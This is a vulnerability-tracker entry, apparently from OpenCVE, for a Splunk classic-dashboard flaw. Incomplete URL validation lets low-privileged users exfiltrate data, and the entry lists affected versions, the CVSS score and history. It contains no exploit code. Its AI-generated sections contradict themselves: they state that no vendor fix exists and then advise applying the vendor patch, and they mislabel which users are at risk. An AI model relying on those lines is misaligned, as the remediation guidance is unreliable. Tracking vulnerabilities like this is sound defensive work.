Description
In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server.

The vulnerability exists because URL validation on the external content dialog is incomplete, which can allow for requests to untrusted domains when a user interacts with a crafted dashboard.
Published: 2026-06-10
Score: 5.7 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A classic dashboard in Splunk Enterprise or Splunk Cloud Platform can be crafted by a low‑privileged user to trigger URL requests to external domains. The flaw lies in incomplete URL validation on the external content dialog, enabling the user to exfiltrate sensitive information without authorization, resulting in confidentiality compromise.

Affected Systems

The vulnerability affects Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12 and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23 and 9.3.2411.132. Users with roles other than admin or power are susceptible.

Risk and Exploitability

The CVSS score of 5.7 indicates moderate severity. EPSS data is not available, and the vulnerability is not listed in CISA KEV. The likely attack vector is legitimate user interaction with a maliciously crafted dashboard within the Splunk web interface, requiring minimal privileges but potentially enabling unauthorized data transfer to an attacker controlled external server.

Generated by OpenCVE AI on June 10, 2026 at 19:23 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the vendor‑supplied patch or upgrade Splunk to versions 10.2.4 and higher for Enterprise, or 10.3.2512.13 and higher for Cloud Platform.
  • Configure Splunk to block or restrict external content for users lacking admin or power roles, ensuring only whitelisted domains are allowed.
  • Implement network or firewall rules to prevent outbound traffic from Splunk instances to untrusted external domains.

Generated by OpenCVE AI on June 10, 2026 at 19:23 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 21:15:00 +0000

Type Values Removed Values Added
First Time appeared Splunk
Splunk splunk Cloud Platform
Splunk splunk Enterprise
Vendors & Products Splunk
Splunk splunk Cloud Platform
Splunk splunk Enterprise

Wed, 10 Jun 2026 18:15:00 +0000

Type Values Removed Values Added
Description In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious classic dashboard that exfiltrates sensitive data to an external server. The vulnerability exists because URL validation on the external content dialog is incomplete, which can allow for requests to untrusted domains when a user interacts with a crafted dashboard.
Title Improper Input Validation through Classic Dashboards in Splunk Enterprise
Weaknesses CWE-20
References
Metrics cvssV3_1

{'score': 5.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}

Subscriptions

Splunk Splunk Cloud Platform Splunk Enterprise
cve-icon MITRE

Status: PUBLISHED

Assigner: cisco

Published:

Updated: 2026-06-10T18:25:12.492Z

Reserved: 2025-10-08T11:59:15.401Z

Link: CVE-2026-20255

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Undergoing Analysis

Published: 2026-06-10T18:16:41.010

Modified: 2026-06-10T18:36:19.463

Link: CVE-2026-20255

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-10T21:00:06Z

Weaknesses